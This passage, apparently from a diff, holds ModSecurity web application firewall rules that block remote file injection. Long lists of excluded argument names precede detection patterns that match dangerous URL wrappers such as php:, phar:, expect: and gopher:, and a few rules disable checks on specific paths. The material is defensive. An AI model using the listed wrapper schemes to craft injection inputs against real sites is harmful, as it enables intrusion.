xthreads/|!ARGS:flv|!ARGS:dest|!ARGS:languageChange|!ARGS:/^perch_/|!ARGS:music|!ARGS:/^p_posts/|!ARGS:input_50|!ARGS:/resolv/|!ARGS:/^install_package/|!ARGS:/address/|!ARGS:refsrc|!ARGS:hp|!ARGS:/censor/|!ARGS:UpdateNote|!ARGS:regx_root|!ARGS:input_3|!ARGS:/avatar/|!ARGS:obj_itop|!ARGS:/feed/|!ARGS:value_string_9|!ARGS:/^cf/|!ARGS:/uri/|!ARGS:color_chart|!ARGS:ui|!ARGS:armoury|!ARGS:reverbnation|!ARGS:/return/|!ARGS:fromp|!ARGS:/site/|!ARGS:_ref|!ARGS:owa_protocol|!ARGS:sfhome|!ARGS:live|!ARGS:/^func_key/|!ARGS:/trackback/|!ARGS:gmaps|!ARGS:locationhp|!ARGS:loc|!ARGS:pfad|!ARGS:CUSTID|!ARGS:/img/|!ARGS:/photo/|!ARGS:/logo/|!ARGS:go|!ARGS:/^utm/|!ARGS:resolution|!ARGS:/export/|!ARGS:/link/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:path[alias]|!ARGS:/message/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:camefrom|!ARGS:ucapi|!ARGS:/click/|!ARGS:rf|!ARGS:payment_home|!ARGS:sourcetitle|!ARGS:form_pathscript|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:dcsref|!ARGS:/^win/|!ARGS:lec_rm|!ARGS:n-state|!ARGS:CP_email|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:attribute29|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:request|!ARGS:/server/|!ARGS:confirm|!ARGS:/^groups/|!ARGS:came_from|!ARGS:prodLogo|!ARGS:prodDownload|!ARGS:itemIntro|!ARGS:photo|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:typePageCode|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:/body/|!ARGS:/^product_long_/|!ARGS:/content/|!ARGS:banner_top|!ARGS:banners_list|!ARGS:heading|!ARGS:packageComments|!ARGS:cl_post|!ARGS:board_msg|!ARGS:/html/|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:msg|!ARGS:configuration_key|!ARGS:search|!ARGS:/comment/|!ARGS:enquiry|!ARGS:/desc/|!ARGS:customer_footer|!ARGS:FAQTitle|!ARGS:host|!ARGS:/text/|!ARGS:whereto|!ARGS:pathToPiwik|!ARGS:admin_footer|!ARGS:email_sig|!ARGS:/^artsee_banner_/|!ARGS:pingback_service|!ARGS:showStr|!ARGS:/hostname/|!ARGS:/http/|!ARGS:bannercode|!ARGS:email_forward|!ARGS:fetch|!ARGS:/txt/|!ARGS:mesg|!ARGS:forward|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/template/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:footer_scripts|!ARGS:advBannerMessage|!ARGS:u|!ARGS:/header/|!ARGS:action|!ARGS:cptpl_dir|!ARGS:arg6|!ARGS:dbhost|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:cat_sponsor|!ARGS:stretch|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:newsettings[files_dir]|!ARGS:contactMessage|!ARGS:var_value[usps_labels_help_2]|!ARGS:short_story|!ARGS:vinculo|!ARGS:cts|!ARGS:response|!ARGS:hd_request|!ARGS:relocate|!ARGS:add_fd3|!ARGS:soundname|!ARGS:bbcode_tpl|!ARGS:/link/|!ARGS:faqText|!ARGS:request_uri|!ARGS:/google/|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:searchstring|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:Comentario|!ARGS:dynadata[_SIGNATURE]|!ARGS:paypal_ipn|!ARGS:title|!ARGS:/frame/|!ARGS:l1_bdy|!ARGS:theMessage|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:uri|!ARGS:wp_home|!ARGS:/^ViewState/|!ARGS:postvars|!ARGS:base1|!ARGS:layout|!ARGS:EditorHTML|!ARGS:theVisibility|!ARGS:friend_M|!ARGS:before|!ARGS:option[home]|!ARGS:sm_b_style|!ARGS:success|!ARGS:/^css/|!ARGS:short_story|!ARGS:vthumb|!ARGS:introduction|!ARGS:register_at|!ARGS:statusaddress|!ARGS:revnews_ad_120|!ARGS:/sponsor_banner/|!ARGS:newText|!ARGS:PageCopy|!ARGS:amp;loc|!ARGS:option[78]|!ARGS:agendWebPage|!ARGS:/icon/|!ARGS:/ftp/|!ARGS:button_dir|!ARGS:x_organizational|!ARGS:form_element3|!ARGS:answer|!ARGS:intro|!ARGS:note|!ARGS:c_msg|!ARGS:how_did_you_hear_about_us|!ARGS:back_to|!ARGS:/sql/|!ARGS:prefix|!ARGS:problem|!ARGS:default_banner|!ARGS:archive_chrono|!ARGS:home|!ARGS:thm|!ARGS:_RW_|!ARGS:/rss/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:helpbox|!ARGS:ureferrer|!ARGS:redir|!ARGS:refertoyouby|!ARGS:ret|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:inc|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:Post|!ARGS:reply|!ARGS:last_msg|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:notes|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:view|!ARGS:howhear|!ARGS:refer|!ARGS:oldmsg|!ARGS:/referer/|!ARGS:/refer/|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:signature|!ARGS:disc|!ARGS:utmr|!ARGS:user[signature]|!ARGS:Query|!ARGS:steps|!ARGS:bbcode_replace|!ARGS:jumpTo|!ARGS:memo|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:from|!ARGS:footer|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:configParams[api][configParamValue]|!ARGS:/^wimpy/|!ARGS:fb_ref|!ARGS:newidentities[0][signature]|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:value_190|!ARGS:/ajax/|!ARGS:backto|!ARGS:/^rsargs/|!ARGS:op|!ARGS:Store_CustomerEmail_Header|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:ret|!ARGS:area|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:st_widget|!ARGS:ban_reason|!ARGS:def|!ARGS:data[Email][comment]|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:home_top|!ARGS:Store_OUI_GlobalFooter|!ARGS:dynafield[_SIGNATURE]|!ARGS:payment_extrainfo|!ARGS:wysiwyg|!ARGS:banner|!ARGS:env_ping_list|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:/^k2extra/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:320162,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,chain,rev:287,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{MATCHED_VAR}'"
+SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/" "t:none,t:urlDecodeUni,t:lowercase"
+
+SecRule REQUEST_URI|ARGS|!ARGS:id|!ARGS:kotisivu|!ARGS:mb|!ARGS:jibber|!ARGS:wordpress_extra|!ARGS:origin|!ARGS:pattern_select|!ARGS:fail|!ARGS:success|!ARGS:move_to|!ARGS:/^listingfields/|!ARGS:svc_id|!ARGS:/^constant_contact/|!ARGS:hq|!ARGS:/flsrv/|!ARGS:svc_id|!ARGS:/foto/|!ARGS:junkWords|!ARGS:name_ip|!ARGS:/stream/|!ARGS:canonical|!ARGS:/addy/|!ARGS:rel_path|!ARGS:aim|!ARGS:/^field/|!ARGS:details|!ARGS:/^complete_action/|!ARGS:profile_id|!ARGS:api|!ARGS:/^option_value/|!ARGS:button_src|!ARGS:cc_list_id|!ARGS:/buzz/|!ARGS:/jform/|!ARGS:/liveUpdate/|!ARGS:/service/|!ARGS:marqueur|!ARGS:/vertex/|!ARGS:metavalue|!ARGS:binary|!ARGS:snippet|!ARGS:/^ZA_ARTICLE/|!ARGS:obr|!ARGS:back|!ARGS:^/xcpr_/|!ARGS:/pic/|!ARGS:/plaatje/|!ARGS:profile|!ARGS:repository|!ARGS:/export/|!ARGS:os|!ARGS:ticketmaster|!ARGS:/destination/|!ARGS:r|!ARGS:/speedtest/|!ARGS:voice|!ARGS:/tripadvisor/|!ARGS:/iTunes/|!ARGS:lang_default_value|!ARGS:weather|!ARGS:/metakey/|!ARGS:/target/|!ARGS:/password/|!ARGS:/note/|!ARGS:form_profile|!ARGS:/theme/|!ARGS:ip|!ARGS:/afbeelding/|!ARGS:/screenshot/|!ARGS:embed_code|!ARGS:/^input_/|!ARGS:/^flb/|!ARGS:gwefan|!ARGS:/xthreads/|!ARGS:flv|!ARGS:dest|!ARGS:languageChange|!ARGS:/^perch_/|!ARGS:music|!ARGS:/^p_posts/|!ARGS:input_50|!ARGS:/resolv/|!ARGS:/^install_package/|!ARGS:/address/|!ARGS:wlp|!ARGS:hp|!ARGS:refsrc|!ARGS:/censor/|!ARGS:UpdateNote|!ARGS:regx_root|!ARGS:input_3|!ARGS:file|!ARGS:/avatar/|!ARGS:obj_itop|!ARGS:/feed/|!ARGS:value_string_9|!ARGS:/^cf/|!ARGS:/uri/|!ARGS:color_chart|!ARGS:ui|!ARGS:armoury|!ARGS:reverbnation|!ARGS:/return/|!ARGS:fromp|!ARGS:/site/|!ARGS:_ref|!ARGS:owa_protocol|!ARGS:sfhome|!ARGS:live|!ARGS:/^func_key/|!ARGS:/trackback/|!ARGS:gmaps|!ARGS:locationhp|!ARGS:pfad|!ARGS:CUSTID|!ARGS:/img/|!ARGS:/^obj_/|!ARGS:direct|!ARGS:fflv|!ARGS:direct|!ARGS:source_location/|!ARGS:/^fetch/|!ARGS:/web/|!ARGS:/openid/|!ARGS:/adres/|!ARGS:/logo/|!ARGS:go|!ARGS:resolution|!ARGS:catalogue_search_code|!ARGS:/link/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:path[alias]|!ARGS:/message/|!ARGS:/^utm/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:camefrom|!ARGS:ucapi|!ARGS:clickTag1|!ARGS:rf|!ARGS:payment_home|!ARGS:sourcetitle|!ARGS:form_pathscript|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:dcsref|!ARGS:lec_rm|!ARGS:n-state|!ARGS:CP_email|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:/^clickTagFrame/|!ARGS:/^attr/|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:request|!ARGS:confirm|!ARGS:/^groups/|!ARGS:came_from|!ARGS:prodLogo|!ARGS:prodDownload|!ARGS:/^V_feed/|!ARGS:itemIntro|!ARGS:photo|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:typePageCode|!ARGS:/^GARS_existing/|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:loc|!ARGS:/body/|!ARGS:/^product_long/|!ARGS:/server/|!ARGS:/content/|!ARGS:banner_top|!ARGS:banners_list|!ARGS:heading|!ARGS:packageComments|!ARGS:cl_post|!ARGS:board_msg|!ARGS:/html/|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:msg|!ARGS:configuration_key|!ARGS:search|!ARGS:/comment/|!ARGS:enquiry|!ARGS:/desc/|!ARGS:/footer/|!ARGS:FAQTitle|!ARGS:host|!ARGS:/text/|!ARGS:whereto|!ARGS:item[content]|!ARGS:pathToPiwik|!ARGS:email_sig|!ARGS:minicms_content|!ARGS:feed|!ARGS:/^artsee_banner_/|!ARGS:fetch|!ARGS:pingback_service|!ARGS:/hostname/|!ARGS:/http/|!ARGS:f_content|!ARGS:email_forward|!ARGS:bannercode|!ARGS:mesg|!ARGS:forward|!ARGS:atc_content|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/template/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:question_content|!ARGS:u|!ARGS:header|!ARGS:action|!ARGS:cptpl_dir|!ARGS:file_contents|!ARGS:contents|!ARGS:arg6|!ARGS:dbhost|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:stretch|!ARGS:cat_sponsor|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:relocate|!ARGS:add_fd3|!ARGS:headers-28|!ARGS:soundname|!ARGS:bbcode_tpl|!ARGS:faqText|!ARGS:/google/|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:searchstring|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:Comentario|!ARGS:/^dynadata/|!ARGS:paypal_ipn|!ARGS:title|!ARGS:right_frame|!ARGS:l1_bdy|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:wp_home|!ARGS:/^ViewState/|!ARGS:postvars|!ARGS:vars[DBhostname]|!ARGS:base1|!ARGS:cart_header|!ARGS:layout|!ARGS:short_story|!ARGS:/sponsor_banner/|!ARGS:newText|!ARGS:PageCopy|!ARGS:amp;loc|!ARGS:f_header|!ARGS:option[78]|!ARGS:savecontent|!ARGS:agendWebPage|!ARGS:/ftp/|!ARGS:gen_header|!ARGS:button_dir|!ARGS:x_organizational|!ARGS:form_element3|!ARGS:answer|!ARGS:intro|!ARGS:c_msg|!ARGS:note|!ARGS:domain|!ARGS:how_did_you_hear_about_us|!ARGS:back_to|!ARGS:/sql/|!ARGS:prefix|!ARGS:clickTAG|!ARGS:problem|!ARGS:default_banner|!ARGS:archive_chrono|!ARGS:home|!ARGS:thm|!ARGS:_RW_|!ARGS:/rss/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:helpbox|!ARGS:redir|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:filecontent|!ARGS:inc|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:Post|!ARGS:reply|!ARGS:last_msg|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:view|!ARGS:howhear|!ARGS:oldmsg|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:signature|!ARGS:disc|!ARGS:utmr|!ARGS:user[signature]|!ARGS:Query|!ARGS:steps|!ARGS:bbcode_replace|!ARGS:jumpTo|!ARGS:memo|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:goto|!ARGS:from|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:configParams[api][configParamValue]|!ARGS:/^wimpy/|!ARGS:msgpreview|!ARGS:fb_ref|!ARGS:notes|!ARGS:pn_domain|!ARGS:newidentities[0][signature]|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:value_190|!ARGS:pp_bio_content|!ARGS:/ajax/|!ARGS:backto|!ARGS:/^rsargs/|!ARGS:op|!ARGS:BLK_block_content|!ARGS:ret|!ARGS:Store_CustomerEmail_Header|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:area|!ARGS:content|!ARGS:/^data\[tt_content\]/|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:newcontent|!ARGS:st_widget|!ARGS:ban_reason|!ARGS:def|!ARGS:data[Email][comment]|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:home_top|!ARGS:Store_OUI_GlobalFooter|!ARGS:map|!ARGS:dynafield[_SIGNATURE]|!ARGS:payment_extrainfo|!ARGS:cta_content|!ARGS:wysiwyg|!ARGS:banner|!ARGS:env_ping_list|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:cta_content|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:code|!ARGS:p_content|!ARGS:/^k2extra/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:lowercase,multimatch,id:320163,rev:287,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{MATCHED_VAR}',chain"
+SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_92126
+
+SecRule REQUEST_FILENAME "/theme/functions/upload\.php" "phase:2,id:92127,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"
+
+SecRule REQUEST_FILENAME "/showimage\.php\.jpg" "phase:2,id:92128,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340035"
+
+SecRule REQUEST_FILENAME "/forums/admin/index\.php" "phase:2,id:92129,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+SecAction "phase:2,id:92130,t:none,pass,nolog,skipAfter:END_RULES_92130"
+
+SecRule ARGS|!ARGS:/field_/|!ARGS:id|!ARGS:/addy/|!ARGS:rel_path|!ARGS:aim|!ARGS:api|!ARGS:details|!ARGS:/^field/|!ARGS:profile_id|!ARGS:/^complete_action/|!ARGS:/^option_value/|!ARGS:/buzz/|!ARGS:cc_list_id|!ARGS:/jform/|!ARGS:/liveUpdate/|!ARGS:/service/|!ARGS:marqueur|!ARGS:/vertex/|!ARGS:metavalue|!ARGS:binary|!ARGS:snippet|!ARGS:/^ZA_ARTICLE/|!ARGS:obr|!ARGS:^/xcpr_/|!ARGS:back|!ARGS:/pic/|!ARGS:/plaatje/|!ARGS:profile|!ARGS:repository|!ARGS:catalogue_search_code|!ARGS:os|!ARGS:ticketmaster|!ARGS:/destination/|!ARGS:r|!ARGS:/speedtest/|!ARGS:voice|!ARGS:/tripadvisor/|!ARGS:/iTunes/|!ARGS:service|!ARGS:lang_default_value|!ARGS:weather|!ARGS:/metakey/|!ARGS:/target/|!ARGS:/password/|!ARGS:/note/|!ARGS:form_profile|!ARGS:/theme/|!ARGS:ip|!ARGS:/afbeelding/|!ARGS:/screenshot/|!ARGS:/^input_/|!ARGS:embed_code|!ARGS:/^flb/|!ARGS:gwefan|!ARGS:/xthreads/|!ARGS:flv|!ARGS:dest|!ARGS:languageChange|!ARGS:/^perch_/|!ARGS:music|!ARGS:/^p_posts/|!ARGS:input_50|!ARGS:/resolv/|!ARGS:/^install_package/|!ARGS:/address/|!ARGS:refsrc|!ARGS:hp|!ARGS:/censor/|!ARGS:UpdateNote|!ARGS:regx_root|!ARGS:input_3|!ARGS:/avatar/|!ARGS:obj_itop|!ARGS:/feed/|!ARGS:value_string_9|!ARGS:/^cf/|!ARGS:/uri/|!ARGS:color_chart|!ARGS:ui|!ARGS:armoury|!ARGS:reverbnation|!ARGS:/return/|!ARGS:fromp|!ARGS:/site/|!ARGS:_ref|!ARGS:owa_protocol|!ARGS:sfhome|!ARGS:live|!ARGS:/^func_key/|!ARGS:/trackback/|!ARGS:gmaps|!ARGS:locationhp|!ARGS:loc|!ARGS:pfad|!ARGS:CUSTID|!ARGS:/img/|!ARGS:/photo/|!ARGS:/logo/|!ARGS:go|!ARGS:/^utm/|!ARGS:resolution|!ARGS:/export/|!ARGS:/link/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:path[alias]|!ARGS:/message/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:camefrom|!ARGS:ucapi|!ARGS:/click/|!ARGS:rf|!ARGS:payment_home|!ARGS:sourcetitle|!ARGS:form_pathscript|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:dcsref|!ARGS:/^win/|!ARGS:lec_rm|!ARGS:n-state|!ARGS:CP_email|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:attribute29|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:request|!ARGS:/server/|!ARGS:confirm|!ARGS:/^groups/|!ARGS:came_from|!ARGS:prodLogo|!ARGS:prodDownload|!ARGS:itemIntro|!ARGS:photo|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:typePageCode|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:/body/|!ARGS:/^product_long_/|!ARGS:/content/|!ARGS:banner_top|!ARGS:banners_list|!ARGS:heading|!ARGS:packageComments|!ARGS:cl_post|!ARGS:board_msg|!ARGS:/html/|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:msg|!ARGS:configuration_key|!ARGS:search|!ARGS:/comment/|!ARGS:enquiry|!ARGS:/desc/|!ARGS:customer_footer|!ARGS:FAQTitle|!ARGS:host|!ARGS:/text/|!ARGS:whereto|!ARGS:pathToPiwik|!ARGS:admin_footer|!ARGS:email_sig|!ARGS:/^artsee_banner_/|!ARGS:pingback_service|!ARGS:showStr|!ARGS:/hostname/|!ARGS:/http/|!ARGS:bannercode|!ARGS:email_forward|!ARGS:fetch|!ARGS:/txt/|!ARGS:mesg|!ARGS:forward|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/template/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:footer_scripts|!ARGS:advBannerMessage|!ARGS:u|!ARGS:/header/|!ARGS:action|!ARGS:cptpl_dir|!ARGS:arg6|!ARGS:dbhost|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:cat_sponsor|!ARGS:stretch|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:newsettings[files_dir]|!ARGS:contactMessage|!ARGS:var_value[usps_labels_help_2]|!ARGS:short_story|!ARGS:vinculo|!ARGS:cts|!ARGS:response|!ARGS:hd_request|!ARGS:relocate|!ARGS:add_fd3|!ARGS:soundname|!ARGS:bbcode_tpl|!ARGS:/link/|!ARGS:faqText|!ARGS:request_uri|!ARGS:/google/|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:searchstring|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:Comentario|!ARGS:dynadata[_SIGNATURE]|!ARGS:paypal_ipn|!ARGS:title|!ARGS:/frame/|!ARGS:l1_bdy|!ARGS:theMessage|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:uri|!ARGS:wp_home|!ARGS:/^ViewState/|!ARGS:postvars|!ARGS:base1|!ARGS:layout|!ARGS:EditorHTML|!ARGS:theVisibility|!ARGS:friend_M|!ARGS:before|!ARGS:option[home]|!ARGS:sm_b_style|!ARGS:success|!ARGS:/^css/|!ARGS:short_story|!ARGS:vthumb|!ARGS:introduction|!ARGS:register_at|!ARGS:statusaddress|!ARGS:revnews_ad_120|!ARGS:/sponsor_banner/|!ARGS:newText|!ARGS:PageCopy|!ARGS:amp;loc|!ARGS:option[78]|!ARGS:agendWebPage|!ARGS:/icon/|!ARGS:/ftp/|!ARGS:button_dir|!ARGS:x_organizational|!ARGS:form_element3|!ARGS:answer|!ARGS:intro|!ARGS:note|!ARGS:c_msg|!ARGS:how_did_you_hear_about_us|!ARGS:back_to|!ARGS:/sql/|!ARGS:prefix|!ARGS:problem|!ARGS:default_banner|!ARGS:archive_chrono|!ARGS:home|!ARGS:thm|!ARGS:_RW_|!ARGS:/rss/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:helpbox|!ARGS:ureferrer|!ARGS:redir|!ARGS:refertoyouby|!ARGS:ret|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:inc|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:Post|!ARGS:reply|!ARGS:last_msg|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:notes|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:view|!ARGS:howhear|!ARGS:refer|!ARGS:oldmsg|!ARGS:/referer/|!ARGS:/refer/|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:signature|!ARGS:disc|!ARGS:utmr|!ARGS:user[signature]|!ARGS:Query|!ARGS:steps|!ARGS:bbcode_replace|!ARGS:jumpTo|!ARGS:memo|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:from|!ARGS:footer|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:configParams[api][configParamValue]|!ARGS:/^wimpy/|!ARGS:fb_ref|!ARGS:newidentities[0][signature]|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:value_190|!ARGS:/ajax/|!ARGS:backto|!ARGS:/^rsargs/|!ARGS:op|!ARGS:Store_CustomerEmail_Header|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:ret|!ARGS:area|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:st_widget|!ARGS:ban_reason|!ARGS:def|!ARGS:data[Email][comment]|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:home_top|!ARGS:Store_OUI_GlobalFooter|!ARGS:dynafield[_SIGNATURE]|!ARGS:payment_extrainfo|!ARGS:wysiwyg|!ARGS:banner|!ARGS:env_ping_list|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:/^k2extra/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:320164,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{MATCHED_VAR}'"
+SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/" "t:none,t:urlDecodeUni,t:lowercase"
+
+SecRule REQUEST_URI|ARGS|!ARGS:/field_/|!ARGS:aim|!ARGS:/^field/|!ARGS:details|!ARGS:/^complete_action/|!ARGS:profile_id|!ARGS:api|!ARGS:/^option_value/|!ARGS:button_src|!ARGS:cc_list_id|!ARGS:/buzz/|!ARGS:/jform/|!ARGS:/liveUpdate/|!ARGS:/service/|!ARGS:marqueur|!ARGS:/vertex/|!ARGS:metavalue|!ARGS:binary|!ARGS:snippet|!ARGS:/^ZA_ARTICLE/|!ARGS:obr|!ARGS:back|!ARGS:^/xcpr_/|!ARGS:/pic/|!ARGS:/plaatje/|!ARGS:profile|!ARGS:repository|!ARGS:/export/|!ARGS:os|!ARGS:ticketmaster|!ARGS:/destination/|!ARGS:r|!ARGS:/speedtest/|!ARGS:voice|!ARGS:/tripadvisor/|!ARGS:/iTunes/|!ARGS:lang_default_value|!ARGS:weather|!ARGS:/metakey/|!ARGS:/target/|!ARGS:/password/|!ARGS:/note/|!ARGS:form_profile|!ARGS:/theme/|!